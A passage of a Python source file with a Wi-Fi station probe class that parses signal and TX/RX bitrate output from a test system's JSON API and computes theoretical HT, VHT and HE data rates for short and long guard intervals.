        dot-separated fields form the probe URL.
        NOTE(review): despite the None default, eid_str must be provided —
        .split() below would raise AttributeError on None. TODO confirm
        callers always pass it.
    """
    super().__init__(_lfjson_host=lfhost,
                     _lfjson_port=lfport,
                     _debug=debug)
    # e.g. '1.1.sta0000' -> ['1', '1', 'sta0000']; only the last two are used
    hunks = eid_str.split(".")
    self.eid_str = eid_str
    self.probepath = "/probe/1/%s/%s" % (hunks[-2], hunks[-1])
    # Raw JSON response and parsed 'signal' lines, filled by refreshProbe().
    self.response = None
    self.signals = None
    self.ofdma = False
    # TX link statistics parsed from the probe output (set by refreshProbe).
    self.tx_bitrate = None
    self.tx_mcs = None
    self.tx_nss = None
    self.tx_mbit = None
    self.tx_mhz = None
    self.tx_gi = None
    self.tx_duration = None
    self.tx_mbit_calc = None
    self.tx_data_rate_gi_short_Mbps = None
    self.tx_data_rate_gi_long_Mbps = None
    # RX link statistics, mirroring the TX fields above.
    self.rx_bitrate = None
    self.rx_mcs = None
    self.rx_nss = None
    self.rx_mbit = None
    self.rx_mhz = None
    self.rx_gi = None
    self.rx_duration = None
    self.rx_mbit_calc = None
    self.rx_data_rate_gi_short_Mbps = None
    self.rx_data_rate_gi_long_Mbps = None
    self.data_rate = None
# folder = os.path.dirname(__file__)
def refreshProbe(self):
self.json_post(self.probepath, {})
sleep(0.2)
response = self.json_get(self.probepath)
self.response = response
if self.debug:
print("probepath (eid): {probepath}".format(probepath=self.probepath))
pprint("Probe response: {response}".format(response=self.response))
text = self.response['probe-results'][0][self.eid_str]['probe results'].split('\n')
signals = [x.strip('\t').split('\t') for x in text if 'signal' in x]
keys = [x[0].strip(' ').strip(':') for x in signals]
values = [x[1].strip('dBm').strip(' ') for x in signals]
# if self.debug:
print("signals keys: {keys}".format(keys=keys))
print("signals values: {values}".format(values=values))
self.signals = dict(zip(keys, values))
tx_bitrate = [x for x in text if 'tx bitrate' in x][0].replace('\t', ' ')
# if 'HE' in tx_bitrate:
# print("HE not supported ")
print("tx_bitrate {tx_bitrate}".format(tx_bitrate=tx_bitrate))
self.tx_bitrate = tx_bitrate.split(':')[-1].strip(' ')
if 'MHz' in tx_bitrate:
self.tx_mhz = [x.strip('\t') for x in text if 'tx bitrate' in x][0].split('MHz')[0].rsplit(' ')[-1].strip(
' ')
print("tx_mhz {tx_mhz}".format(tx_mhz=self.tx_mhz))
else:
self.tx_mhz = 20
print("HT: tx_mhz {tx_mhz}".format(tx_mhz=self.tx_mhz))
tx_mcs = [x.strip('\t') for x in text if 'tx bitrate' in x][0].split(':')[1].strip('\t')
if 'MCS' in tx_mcs:
self.tx_mcs = int(tx_mcs.split('MCS')[1].strip(' ').split(' ')[0])
print("self.tx_mcs {tx_mcs}".format(tx_mcs=self.tx_mcs))
if 'NSS' in text:
self.tx_nss = [x.strip('\t') for x in text if 'tx bitrate' in x][0].split('NSS')[1].strip(' ')
else:
# nss is not present need to derive from MCS for HT
if 0 <= self.tx_mcs <= 7:
self.tx_nss = 1
elif 8 <= self.tx_mcs <= 15:
self.tx_nss = 2
elif 16 <= self.tx_mcs <= 23:
self.tx_nss = 3
elif 24 <= self.tx_mcs <= 31:
self.tx_nss = 4
print("tx_nss {tx_nss}".format(tx_nss=self.tx_nss))
self.tx_mbit = float(self.tx_bitrate.split(' ')[0])
print("tx_mbit {tx_mbit}".format(tx_mbit=self.tx_mbit))
if 'HE' in tx_bitrate:
self.calculated_data_rate_tx_HE()
elif 'VHT' in tx_bitrate:
self.calculated_data_rate_tx_VHT()
else:
self.calculated_data_rate_tx_HT()
else:
print("No tx MCS value:{tx_bitrate}".format(tx_bitrate=tx_bitrate))
rx_bitrate = [x for x in text if 'rx bitrate' in x][0].replace('\t', ' ')
print("rx_bitrate {rx_bitrate}".format(rx_bitrate=rx_bitrate))
self.rx_bitrate = rx_bitrate.split(':')[-1].strip(' ')
print("self.rx_bitrate {rx_bitrate}".format(rx_bitrate=self.rx_bitrate))
# rx will received : 6Mbps encoding is legacy frame
# for 24g - MHz is 20
# try:
if 'MHz' in rx_bitrate:
self.rx_mhz = [x.strip('\t') for x in text if 'rx bitrate' in x][0].split('MHz')[0].rsplit(' ')[
-1].strip(' ')
print("rx_mhz {rx_mhz}".format(rx_mhz=self.rx_mhz))
else:
self.rx_mhz = 20
rx_mcs = [x.strip('\t') for x in text if 'rx bitrate' in x][0].split(':')[1].strip('\t')
# MCS is not in the 6.0MBit/s frame
if 'MCS' in rx_mcs:
self.rx_mcs = int(rx_mcs.split('MCS')[1].strip(' ').split(' ')[0])
print("self.rx_mcs {rx_mcs}".format(rx_mcs=self.rx_mcs))
if 'NSS' in text:
self.rx_nss = [x.strip('\t') for x in text if 'rx bitrate' in x][0].split('NSS')[1].strip(' ')
else:
# nss is not present need to derive from MCS for HT
if 0 <= self.rx_mcs <= 7:
self.rx_nss = 1
elif 8 <= self.rx_mcs <= 15:
self.rx_nss = 2
elif 16 <= self.rx_mcs <= 23:
self.rx_nss = 3
elif 24 <= self.rx_mcs <= 31:
self.rx_nss = 4
self.rx_mbit = self.rx_bitrate.split(' ')[0]
print("rx_nss {rx_nss}".format(rx_nss=self.rx_nss))
self.rx_mbit = float(self.rx_bitrate.split(' ')[0])
print("rx_mbit {rx_mbit}".format(rx_mbit=self.rx_mbit))
if 'HE' in rx_bitrate:
self.calculated_data_rate_rx_HE()
elif 'VHT' in rx_bitrate:
self.calculated_data_rate_rx_VHT()
else:
self.calculated_data_rate_rx_HT()
else:
print("No rx MCS value:{rx_bitrate}".format(rx_bitrate=rx_bitrate))
def getSignalAvgCombined(self):
return self.signals['signal avg'].split(' ')[0]
def getSignalAvgPerChain(self):
return ' '.join(self.signals['signal avg'].split(' ')[1:])
def getSignalCombined(self):
return self.signals['signal'].split(' ')[0]
def getSignalPerChain(self):
return ' '.join(self.signals['signal'].split(' ')[1:])
def getBeaconSignalAvg(self):
return ' '.join(self.signals['beacon signal avg']).replace(' ', '')
def calculated_data_rate_tx_HT(self):
print("calculated_data_rate_tx_HT")
# TODO compare with standard for 40 MHz if values change
N_sd = 0 # Number of Data Subcarriers based on modulation and bandwith
N_bpscs = 0 # Number of coded bits per Subcarrier(Determined by the modulation, MCS)
R = 0 # coding , (Determined by the modulation, MCS )
N_ss = 0 # Number of Spatial Streams
T_dft = 3.2 * 10 ** -6 # Constant for HT
T_gi_short = .4 * 10 ** -6 # Guard index.
T_gi_long = .8 * 10 ** -6 # Guard index.
bw = 20
# Note the T_gi is not exactly know so need to calculate bothh with .4 and .8
# the nubmer of Data Subcarriers is based on modulation and bandwith
bw = int(self.tx_mhz)
print("Mhz {Mhz}".format(Mhz=self.tx_mhz))
if bw == 20:
N_sd = 52
elif bw == 40:
N_sd = 108
elif bw == 80:
N_sd = 234
elif bw == 160:
N_sd = 468
else:
print("For HT if cannot be read bw is assumed to be 20")
N_sd = 52
self.tx_mhz = 20
# NSS
N_ss = self.tx_nss
# MCS (Modulation Coding Scheme) determines the constands
# MCS 0 == Modulation BPSK R = 1/2 , N_bpscs = 1,
# Only for HT configuration
if self.tx_mcs == 0 or self.tx_mcs == 8 or self.tx_mcs == 16 or self.tx_mcs == 24:
R = 1 / 2
N_bpscs = 1
# MCS 1 == Modulation QPSK R = 1/2 , N_bpscs = 2
elif self.tx_mcs == 1 or self.tx_mcs == 9 or self.tx_mcs == 17 or self.tx_mcs == 25:
R = 1 / 2
N_bpscs = 2
# MCS 2 == Modulation QPSK R = 3/4 , N_bpscs = 2
elif self.tx_mcs == 2 or self.tx_mcs == 10 or self.tx_mcs == 18 or self.tx_mcs == 26:
R = 3 / 4
N_bpscs = 2
# MCS 3 == Modulation 16-QAM R = 1/2 , N_bpscs = 4
elif self.tx_mcs == 3 or self.tx_mcs == 11 or self.tx_mcs == 19 or self.tx_mcs == 27:
R = 1 / 2
N_bpscs = 4
# MCS 4 == Modulation 16-QAM R = 3/4 , N_bpscs = 4
elif self.tx_mcs == 4 or self.tx_mcs == 12 or self.tx_mcs == 20 or self.tx_mcs == 28:
R = 3 / 4
N_bpscs = 4
# MCS 5 == Modulation 64-QAM R = 2/3 , N_bpscs = 6
elif self.tx_mcs == 5 or self.tx_mcs == 13 or self.tx_mcs == 21 or self.tx_mcs == 29:
R = 2 / 3
N_bpscs = 6
# MCS 6 == Modulation 64-QAM R = 3/4 , N_bpscs = 6
elif self.tx_mcs == 6 or self.tx_mcs == 14 or self.tx_mcs == 22 or self.tx_mcs == 30:
R = 3 / 4
N_bpscs = 6
# MCS 7 == Modulation 64-QAM R = 5/6 , N_bpscs = 6
elif self.tx_mcs == 7 or self.tx_mcs == 15 or self.tx_mcs == 23 or self.tx_mcs == 31:
R = 5 / 6
N_bpscs = 6
print(
"tx: mcs {mcs} N_sd {N_sd} N_bpscs {N_bpscs} R {R} N_ss {N_ss} T_dft {T_dft} T_gi_short {T_gi_short}".format(
mcs=self.tx_mcs, N_sd=N_sd, N_bpscs=N_bpscs, R=R, N_ss=N_ss, T_dft=T_dft, T_gi_short=T_gi_short))
self.tx_data_rate_gi_short_Mbps = ((N_sd * N_bpscs * R * float(N_ss)) / (T_dft + T_gi_short)) / 1000000
print("tx_data_rate gi_short {data_rate} Mbit/s".format(data_rate=self.tx_data_rate_gi_short_Mbps))
print(
"tx: mcs {mcs} N_sd {N_sd} N_bpscs {N_bpscs} R {R} N_ss {N_ss} T_dft {T_dft} T_gi_long {T_gi_long}".format(
mcs=self.tx_mcs, N_sd=N_sd, N_bpscs=N_bpscs, R=R, N_ss=N_ss, T_dft=T_dft, T_gi_long=T_gi_long))
self.tx_data_rate_gi_long_Mbps = ((N_sd * N_bpscs * R * float(N_ss)) / (T_dft + T_gi_long)) / 1000000
print("data_rate gi_long {data_rate} Mbps".format(data_rate=self.tx_data_rate_gi_long_Mbps))
if abs(self.tx_mbit - self.tx_data_rate_gi_short_Mbps) <= abs(self.tx_mbit - self.tx_data_rate_gi_long_Mbps):
self.tx_mbit_calc = self.tx_data_rate_gi_short_Mbps
self.tx_gi = T_gi_short
else:
self.tx_mbit_calc = self.tx_data_rate_gi_long_Mbps
self.tx_gi = T_gi_long
def calculated_data_rate_rx_HT(self):
print("calculated_data_rate_rx_HT")
N_sd = 0 # Number of Data Subcarriers based on modulation and bandwith
N_bpscs = 0 # Number of coded bits per Subcarrier(Determined by the modulation, MCS)
R = 0 # coding , (Determined by the modulation, MCS )
N_ss = 0 # Number of Spatial Streams
T_dft = 3.2 * 10 ** -6 # Constant for HT
T_gi_short = .4 * 10 ** -6 # Guard index.
T_gi_long = .8 * 10 ** -6 # Guard index.
bw = 20
# Note the T_gi is not exactly know so need to calculate bothh with .4 and .8
# the nubmer of Data Subcarriers is based on modulation and bandwith
bw = int(self.rx_mhz)
print("Mhz {Mhz}".format(Mhz=self.rx_mhz))
if bw == 20:
N_sd = 52
elif bw == 40:
N_sd = 108
elif bw == 80:
N_sd = 234
elif bw == 160:
N_sd = 468
else:
print("For HT if cannot be read bw is assumed to be 20")
N_sd = 52
self.rx_mhz = 20
# NSS
N_ss = self.rx_nss
# MCS (Modulation Coding Scheme) determines the constands
# MCS 0 == Modulation BPSK R = 1/2 , N_bpscs = 1,
# Only for HT configuration
if self.rx_mcs == 0 or self.rx_mcs == 8 or self.rx_mcs == 16 or self.rx_mcs == 24:
R = 1 / 2
N_bpscs = 1
# MCS 1 == Modulation QPSK R = 1/2 , N_bpscs = 2
elif self.rx_mcs == 1 or self.rx_mcs == 9 or self.rx_mcs == 17 or self.rx_mcs == 25:
R = 1 / 2
N_bpscs = 2
# MCS 2 == Modulation QPSK R = 3/4 , N_bpscs = 2
elif self.rx_mcs == 2 or self.rx_mcs == 10 or self.rx_mcs == 18 or self.rx_mcs == 26:
R = 3 / 4
N_bpscs = 2
# MCS 3 == Modulation 16-QAM R = 1/2 , N_bpscs = 4
elif self.rx_mcs == 3 or self.rx_mcs == 11 or self.rx_mcs == 19 or self.rx_mcs == 27:
R = 1 / 2
N_bpscs = 4
# MCS 4 == Modulation 16-QAM R = 3/4 , N_bpscs = 4
elif self.rx_mcs == 4 or self.rx_mcs == 12 or self.rx_mcs == 20 or self.rx_mcs == 28:
R = 3 / 4
N_bpscs = 4
# MCS 5 == Modulation 64-QAM R = 2/3 , N_bpscs = 6
elif self.rx_mcs == 5 or self.rx_mcs == 13 or self.rx_mcs == 21 or self.rx_mcs == 29:
R = 2 / 3
N_bpscs = 6
# MCS 6 == Modulation 64-QAM R = 3/4 , N_bpscs = 6
elif self.rx_mcs == 6 or self.rx_mcs == 14 or self.rx_mcs == 22 or self.rx_mcs == 30:
R = 3 / 4
N_bpscs = 6
# MCS 7 == Modulation 64-QAM R = 5/6 , N_bpscs = 6
elif self.rx_mcs == 7 or self.rx_mcs == 15 or self.rx_mcs == 23 or self.rx_mcs == 31:
R = 5 / 6
N_bpscs = 6
print(
"mcs {mcs} N_sd {N_sd} N_bpscs {N_bpscs} R {R} N_ss {N_ss} T_dft {T_dft} T_gi_short {T_gi_short}".format(
mcs=self.rx_mcs, N_sd=N_sd, N_bpscs=N_bpscs, R=R, N_ss=N_ss, T_dft=T_dft, T_gi_short=T_gi_short))
self.rx_data_rate_gi_short_Mbps = ((N_sd * N_bpscs * R * float(N_ss)) / (T_dft + T_gi_short)) / 1000000
print("rx_data_rate gi_short {data_rate} Mbit/s".format(data_rate=self.rx_data_rate_gi_short_Mbps))
print(
"mcs {mcs} N_sd {N_sd} N_bpscs {N_bpscs} R {R} N_ss {N_ss} T_dft {T_dft} T_gi_long {T_gi_long}".format(
mcs=self.rx_mcs, N_sd=N_sd, N_bpscs=N_bpscs, R=R, N_ss=N_ss, T_dft=T_dft, T_gi_long=T_gi_long))
self.rx_data_rate_gi_long_Mbps = ((N_sd * N_bpscs * R * float(N_ss)) / (T_dft + T_gi_long)) / 1000000
print("rx_data_rate gi_long {data_rate} Mbps".format(data_rate=self.rx_data_rate_gi_long_Mbps))
if abs(self.rx_mbit - self.rx_data_rate_gi_short_Mbps) <= abs(
self.rx_mbit - self.rx_data_rate_gi_long_Mbps):
self.rx_mbit_calc = self.rx_data_rate_gi_short_Mbps
self.rx_gi = T_gi_short
else:
self.rx_mbit_calc = self.rx_data_rate_gi_long_Mbps
self.rx_gi = T_gi_long
def calculated_data_rate_tx_VHT(self):
print("calculated_data_rate_tx_VHT")
# TODO compare with standard for 40 MHz if values change
N_sd = 0 # Number of Data Subcarriers based on modulation and bandwith
N_bpscs = 0 # Number of coded bits per Subcarrier(Determined by the modulation, MCS)
R = 0 # coding , (Determined by the modulation, MCS )
N_ss = 0 # Number of Spatial Streams
T_dft = 3.2 * 10 ** -6 # Constant for HT
T_gi_short = .4 * 10 ** -6 # Guard index.
T_gi_long = .8 * 10 ** -6 # Guard index.
bw = 20
# Note the T_gi is not exactly know so need to calculate bothh with .4 and .8
# the nubmer of Data Subcarriers is based on modulation and bandwith
bw = int(self.tx_mhz)
print("Mhz {Mhz}".format(Mhz=self.tx_mhz))
if bw == 20:
N_sd = 52
elif bw == 40:
N_sd = 108
elif bw == 80:
N_sd = 234
elif bw == 160:
N_sd = 468
else:
print("For HT if cannot be read bw is assumed to be 20")
N_sd = 52
self.tx_mhz = 20
# NSS
N_ss = self.tx_nss
# MCS (Modulation Coding Scheme) determines the constands
# MCS 0 == Modulation BPSK R = 1/2 , N_bpscs = 1,
# Only for HT configuration
if self.tx_mcs == 0:
R = 1 / 2
N_bpscs = 1
# MCS 1 == Modulation QPSK R = 1/2 , N_bpscs = 2
elif self.tx_mcs == 1:
R = 1 / 2
N_bpscs = 2
# MCS 2 == Modulation QPSK R = 3/4 , N_bpscs = 2
elif self.tx_mcs == 2:
R = 3 / 4
N_bpscs = 2
# MCS 3 == Modulation 16-QAM R = 1/2 , N_bpscs = 4
elif self.tx_mcs == 3:
R = 1 / 2
N_bpscs = 4
# MCS 4 == Modulation 16-QAM R = 3/4 , N_bpscs = 4
elif self.tx_mcs == 4:
R = 3 / 4
N_bpscs = 4
# MCS 5 == Modulation 64-QAM R = 2/3 , N_bpscs = 6
elif self.tx_mcs == 5:
R = 2 / 3
N_bpscs = 6
# MCS 6 == Modulation 64-QAM R = 3/4 , N_bpscs = 6
elif self.tx_mcs == 6:
R = 3 / 4
N_bpscs = 6
# MCS 7 == Modulation 64-QAM R = 5/6 , N_bpscs = 6
elif self.tx_mcs == 7:
R = 5 / 6
N_bpscs = 6
# MCS 8 == Modulation 256-QAM R = 3/4 , N_bpscs = 8
elif self.tx_mcs == 8:
R = 3 / 4
N_bpscs = 8
# MCS 9 == Modulation 256-QAM R = 5/6 , N_bpscs = 8
elif self.tx_mcs == 9:
R = 5 / 6
N_bpscs = 8
print(
"tx: mcs {mcs} N_sd {N_sd} N_bpscs {N_bpscs} R {R} N_ss {N_ss} T_dft {T_dft} T_gi_short {T_gi_short}".format(
mcs=self.tx_mcs, N_sd=N_sd, N_bpscs=N_bpscs, R=R, N_ss=N_ss, T_dft=T_dft, T_gi_short=T_gi_short))
self.tx_data_rate_gi_short_Mbps = ((N_sd * N_bpscs * R * float(N_ss)) / (T_dft + T_gi_short)) / 1000000
print("tx_data_rate gi_short {data_rate} Mbit/s".format(data_rate=self.tx_data_rate_gi_short_Mbps))
print(
"tx: mcs {mcs} N_sd {N_sd} N_bpscs {N_bpscs} R {R} N_ss {N_ss} T_dft {T_dft} T_gi_long {T_gi_long}".format(
mcs=self.tx_mcs, N_sd=N_sd, N_bpscs=N_bpscs, R=R, N_ss=N_ss, T_dft=T_dft, T_gi_long=T_gi_long))
self.tx_data_rate_gi_long_Mbps = ((N_sd * N_bpscs * R * float(N_ss)) / (T_dft + T_gi_long)) / 1000000
print("data_rate gi_long {data_rate} Mbps".format(data_rate=self.tx_data_rate_gi_long_Mbps))
if abs(self.tx_mbit - self.tx_data_rate_gi_short_Mbps) <= abs(self.tx_mbit - self.tx_data_rate_gi_long_Mbps):
self.tx_mbit_calc = self.tx_data_rate_gi_short_Mbps
self.tx_gi = T_gi_short
else:
self.tx_mbit_calc = self.tx_data_rate_gi_long_Mbps
self.tx_gi = T_gi_long
def calculated_data_rate_rx_VHT(self):
print("calculated_data_rate_rx_VHT")
N_sd = 0 # Number of Data Subcarriers based on modulation and bandwith
N_bpscs = 0 # Number of coded bits per Subcarrier(Determined by the modulation, MCS)
R = 0 # coding , (Determined by the modulation, MCS )
N_ss = 0 # Number of Spatial Streams
T_dft = 3.2 * 10 ** -6 # Constant for HT
T_gi_short = .4 * 10 ** -6 # Guard index.
T_gi_long = .8 * 10 ** -6 # Guard index.
# Note the T_gi is not exactly know so need to calculate bothh with .4 and .8
# the nubmer of Data Subcarriers is based on modulation and bandwith
bw = int(self.rx_mhz)
print("Mhz {Mhz}".format(Mhz=self.rx_mhz))
if bw == 20:
N_sd = 52
elif bw == 40:
N_sd = 108
elif bw == 80:
N_sd = 234
elif bw == 160:
N_sd = 468
else:
print("For HT if cannot be read bw is assumed to be 20")
N_sd = 52
self.rx_mhz = 20
# NSS
N_ss = self.rx_nss
# MCS (Modulation Coding Scheme) determines the constands
# MCS 0 == Modulation BPSK R = 1/2 , N_bpscs = 1,
# Only for HT configuration
if self.rx_mcs == 0:
R = 1 / 2
N_bpscs = 1
# MCS 1 == Modulation QPSK R = 1/2 , N_bpscs = 2
elif self.rx_mcs == 1:
R = 1 / 2
N_bpscs = 2
# MCS 2 == Modulation QPSK R = 3/4 , N_bpscs = 2
elif self.rx_mcs == 2:
R = 3 / 4
N_bpscs = 2
# MCS 3 == Modulation 16-QAM R = 1/2 , N_bpscs = 4
elif self.rx_mcs == 3:
R = 1 / 2
N_bpscs = 4
# MCS 4 == Modulation 16-QAM R = 3/4 , N_bpscs = 4
elif self.rx_mcs == 4:
R = 3 / 4
N_bpscs = 4
# MCS 5 == Modulation 64-QAM R = 2/3 , N_bpscs = 6
elif self.rx_mcs == 5:
R = 2 / 3
N_bpscs = 6
# MCS 6 == Modulation 64-QAM R = 3/4 , N_bpscs = 6
elif self.rx_mcs == 6:
R = 3 / 4
N_bpscs = 6
# MCS 7 == Modulation 64-QAM R = 5/6 , N_bpscs = 6
elif self.rx_mcs == 7:
R = 5 / 6
N_bpscs = 6
# MCS 8 == Modulation 256-QAM R = 3/4 , N_bpscs = 8
elif self.rx_mcs == 8:
R = 3 / 4
N_bpscs = 8
# MCS 9 == Modulation 256-QAM R = 5/6 , N_bpscs = 8
elif self.rx_mcs == 9:
R = 5 / 6
N_bpscs = 8
print(
"mcs {mcs} N_sd {N_sd} N_bpscs {N_bpscs} R {R} N_ss {N_ss} T_dft {T_dft} T_gi_short {T_gi_short}".format(
mcs=self.rx_mcs, N_sd=N_sd, N_bpscs=N_bpscs, R=R, N_ss=N_ss, T_dft=T_dft, T_gi_short=T_gi_short))
self.rx_data_rate_gi_short_Mbps = ((N_sd * N_bpscs * R * float(N_ss)) / (T_dft + T_gi_short)) / 1000000
print("rx_data_rate gi_short {data_rate} Mbit/s".format(data_rate=self.rx_data_rate_gi_short_Mbps))
print(
"mcs {mcs} N_sd {N_sd} N_bpscs {N_bpscs} R {R} N_ss {N_ss} T_dft {T_dft} T_gi_long {T_gi_long}".format(
mcs=self.rx_mcs, N_sd=N_sd, N_bpscs=N_bpscs, R=R, N_ss=N_ss, T_dft=T_dft, T_gi_long=T_gi_long))
self.rx_data_rate_gi_long_Mbps = ((N_sd * N_bpscs * R * float(N_ss)) / (T_dft + T_gi_long)) / 1000000
print("rx_data_rate gi_long {data_rate} Mbps".format(data_rate=self.rx_data_rate_gi_long_Mbps))
if abs(self.rx_mbit - self.rx_data_rate_gi_short_Mbps) <= abs(
self.rx_mbit - self.rx_data_rate_gi_long_Mbps):
self.rx_mbit_calc = self.rx_data_rate_gi_short_Mbps
self.rx_gi = T_gi_short
else:
self.rx_mbit_calc = self.rx_data_rate_gi_long_Mbps
self.rx_gi = T_gi_long
##########################################
#
# HE no OFDMA - changes the calculations
#
###########################################
def calculated_data_rate_tx_HE(self):
print("calculated_data_rate_tx_HE")
# TODO compare with standard for 40 MHz if values change
N_sd = 0 # Number of Data Subcarriers based on modulation and bandwith
N_bpscs = 0 # Number of coded bits per Subcarrier(Determined by the modulation, MCS)
R = 0 # coding , (Determined by the modulation, MCS )
N_ss = 0 # Number of Spatial Streams
T_dft = 3.2 * 10 ** -6 # Constant for HT
T_gi_short = .4 * 10 ** -6 # Guard index.
T_gi_long = .8 * 10 ** -6 # Guard index.
bw = 20
# Note the T_gi is not exactly know so need to calculate bothh with .4 and .8
# the nubmer of Data Subcarriers is based on modulation and bandwith
bw = int(self.tx_mhz)
print("Mhz {Mhz}".format(Mhz=self.tx_mhz))
if bw == 20:
N_sd = 52
elif bw == 40:
N_sd = 108
elif bw == 80:
N_sd = 234
elif bw == 160:
N_sd = 468
else:
print("For HT if cannot be read bw is assumed to be 20")
N_sd = 52
self.tx_mhz = 20
# NSS
N_ss = self.tx_nss
# MCS (Modulation Coding Scheme) determines the constands
# MCS 0 == Modulation BPSK R = 1/2 , N_bpscs = 1,
# Only for HT configuration
if self.tx_mcs == 0:
R = 1 / 2
N_bpscs = 1
# MCS 1 == Modulation QPSK R = 1/2 , N_bpscs = 2
elif self.tx_mcs == 1:
R = 1 / 2
N_bpscs = 2
# MCS 2 == Modulation QPSK R = 3/4 , N_bpscs = 2
elif self.tx_mcs == 2:
R = 3 / 4
N_bpscs = 2
# MCS 3 == Modulation 16-QAM R = 1/2 , N_bpscs = 4
elif self.tx_mcs == 3:
R = 1 / 2
N_bpscs = 4
# MCS 4 == Modulation 16-QAM R = 3/4 , N_bpscs = 4
elif self.tx_mcs == 4:
R = 3 / 4
N_bpscs = 4
# MCS 5 == Modulation 64-QAM R = 2/3 , N_bpscs = 6
elif self.tx_mcs == 5:
R = 2 / 3
N_bpscs = 6
# MCS 6 == Modulation 64-QAM R = 3/4 , N_bpscs = 6
elif self.tx_mcs == 6:
R = 3 / 4
N_bpscs = 6
# MCS 7 == Modulation 64-QAM R = 5/6 , N_bpscs = 6
elif self.tx_mcs == 7:
R = 5 / 6
N_bpscs = 6
# MCS 8 == Modulation 256-QAM R = 3/4 , N_bpscs = 8
elif self.tx_mcs == 8:
R = 3 / 4
N_bpscs = 8
# MCS 9 == Modulation 256-QAM R = 5/6 , N_bpscs = 8
elif self.tx_mcs == 9:
R = 5 / 6
N_bpscs = 8
print(
"tx: mcs {mcs} N_sd {N_sd} N_bpscs {N_bpscs} R {R} N_ss {N_ss} T_dft {T_dft} T_gi_short {T_gi_short}".format(
mcs=self.tx_mcs, N_sd=N_sd, N_bpscs=N_bpscs, R=R, N_ss=N_ss, T_dft=T_dft, T_gi_short=T_gi_short))
self.tx_data_rate_gi_short_Mbps = ((N_sd * N_bpscs * R * float(N_ss)) / (T_dft + T_gi_short)) / 1000000
print("tx_data_rate gi_short {data_rate} Mbit/s".format(data_rate=self.tx_data_rate_gi_short_Mbps))
print(
"tx: mcs {mcs} N_sd {N_sd} N_bpscs {N_bpscs} R {R} N_ss {N_ss} T_dft {T_dft} T_gi_long {T_gi_long}".format(
mcs=self.tx_mcs, N_sd=N_sd, N_bpscs=N_bpscs, R=R, N_ss=N_ss, T_dft=T_dft, T_gi_long=T_gi_long))
self.tx_data_rate_gi_long_Mbps = ((N_sd * N_bpscs * R * float(N_ss)) / (T_dft + T_gi_long)) / 1000000
print("data_rate gi_long {data_rate} Mbps".format(data_rate=self.tx_data_rate_gi_long_Mbps))
if abs(self.tx_mbit - self.tx_data_rate_gi_short_Mbps) <= abs(self.tx_mbit - self.tx_data_rate_gi_long_Mbps):
self.tx_mbit_calc = self.tx_data_rate_gi_short_Mbps
self.tx_gi = T_gi_short
else:
self.tx_mbit_calc = self.tx_data_rate_gi_long_Mbps
self.tx_gi = T_gi_long
def calculated_data_rate_rx_HE(self):
print("calculated_data_rate_rx_HE")
N_sd = 0 # Number of Data Subcarriers based on modulation and bandwith
N_bpscs = 0 # Number of coded bits per Subcarrier(Determined by the modulation, MCS)
R = 0 # coding , (Determined by the modulation, MCS )
N_ss = 0 # Number of Spatial Streams
T_dft = 3.2 * 10 ** -6 # Constant for HT
T_gi_short = .4 * 10 ** -6 # Guard index.
T_gi_long = .8 * 10 ** -6 # Guard index.
# Note the T_gi is not exactly know so need to calculate bothh with .4 and .8
# the nubmer of Data Subcarriers is based on modulation and bandwith
bw = int(self.rx_mhz)
print("Mhz {Mhz}".format(Mhz=self.rx_mhz))
if bw == 20:
N_sd = 52
elif bw == 40:
N_sd = 108
elif bw == 80:
N_sd = 234
elif bw == 160:
N_sd = 468
else:
print("For HT if cannot be read bw is assumed to be 20")
N_sd = 52
self.rx_mhz = 20
# NSS
N_ss = self.rx_nss
# MCS (Modulation Coding Scheme) determines the constands
# MCS 0 == Modulation BPSK R = 1/2 , N_bpscs = 1,
# Only for HT configuration
if self.rx_mcs == 0:
R = 1 / 2
N_bpscs = 1
# MCS 1 == Modulation QPSK R = 1/2 , N_bpscs = 2
elif self.rx_mcs == 1:
R = 1 / 2
N_bpscs = 2
# MCS 2 == Modulation QPSK R = 3/4 , N_bpscs = 2
elif self.rx_mcs == 2:
R = 3 / 4
N_bpscs = 2
# MCS 3 == Modulation 16-QAM R = 1/2 , N_bpscs = 4
elif self.rx_mcs == 3:
R = 1 / 2
N_bpscs = 4
# MCS 4 == Modulation 16-QAM R = 3/4 , N_bpscs = 4
elif self.rx_mcs == 4:
R = 3 / 4
N_bpscs = 4
# MCS 5 == Modulation 64-QAM R = 2/3 , N_bpscs = 6
elif self.rx_mcs == 5:
R = 2 / 3
N_bpscs = 6
# MCS 6 == Modulation 64-QAM R = 3/4 , N_bpscs = 6
elif self.rx_mcs == 6:
R = 3 / 4
N_bpscs = 6
# MCS 7 == Modulation 64-QAM R = 5/6 , N_bpscs = 6
elif self.rx_mcs == 7:
R = 5 / 6
N_bpscs = 6
# MCS 8 == Modulation 256-QAM R = 3/4 , N_bpscs = 8
elif self.rx_mcs == 8:
R = 3 / 4
N_bpscs = 8
# MCS 9 == Modulation 256-QAM R = 5/6 , N_bpscs = 8
elif self.rx_mcs == 9:
R = 5 / 6
N_bpscs = 8
print(
"mcs {mcs} N_sd {N_sd} N_bpscs {N_bpscs} R {R} N_ss {N_ss} T_dft {T_dft} T_gi_short {T_gi_short}".format(
mcs=self.rx_mcs, N_sd=N_sd, N_bpscs=N_bpscs, R=R, N_ss=N_ss, T_dft=T_dft, T_gi_short=T_gi_short))
self.rx_data_rate_gi_short_Mbps = ((N_sd * N_bpscs * R * float(N_ss)) / (T_dft + T_gi_short)) / 1000000
print("rx_data_rate gi_short {data_rate} Mbit/s".format(data_rate=self.rx_data_rate_gi_short_Mbps))
print(
"mcs {mcs} N_sd {N_sd} N_bpscs {N_bpscs} R {R} N_ss {N_ss} T_dft {T_dft} T_gi_long {T_gi_long}".format(
mcs=self.rx_mcs, N_sd=N_sd, N_bpscs=N_bpscs, R=R, N_ss=N_ss, T_dft=T_dft, T_gi_long=T_gi_long))
self.rx_data_rate_gi_long_Mbps = ((N_sd * N_bpscs * R * float(N_ss)) / (T_dft + T_gi_long)) / 1000000
print("rx_data_rate gi_long {data_rate} Mbps".format(data_rate=self.rx_data_rate_gi_long_Mbps))
if abs(self.rx_mbit - self.rx_data_rate_gi_short_Mbps) <= abs(
self.rx_mbit - self.rx_data_rate_gi_long_Mbps):
self.rx_mbit_calc = self.rx_data_rate_gi_short_Mbps
self.rx_gi = T_gi_short
else:
self.rx_mbit_calc = self.rx_data_rate_gi_long_Mbps
self.rx_gi = T_gi_long
| 43.911017
| 122
| 0.545917
| 5,084
| 31,089
| 3.079268
| 0.04465
| 0.068221
| 0.037943
| 0.011242
| 0.832003
| 0.807921
| 0.781667
| 0.758416
| 0.747237
| 0.740083
| 0
| 0.052575
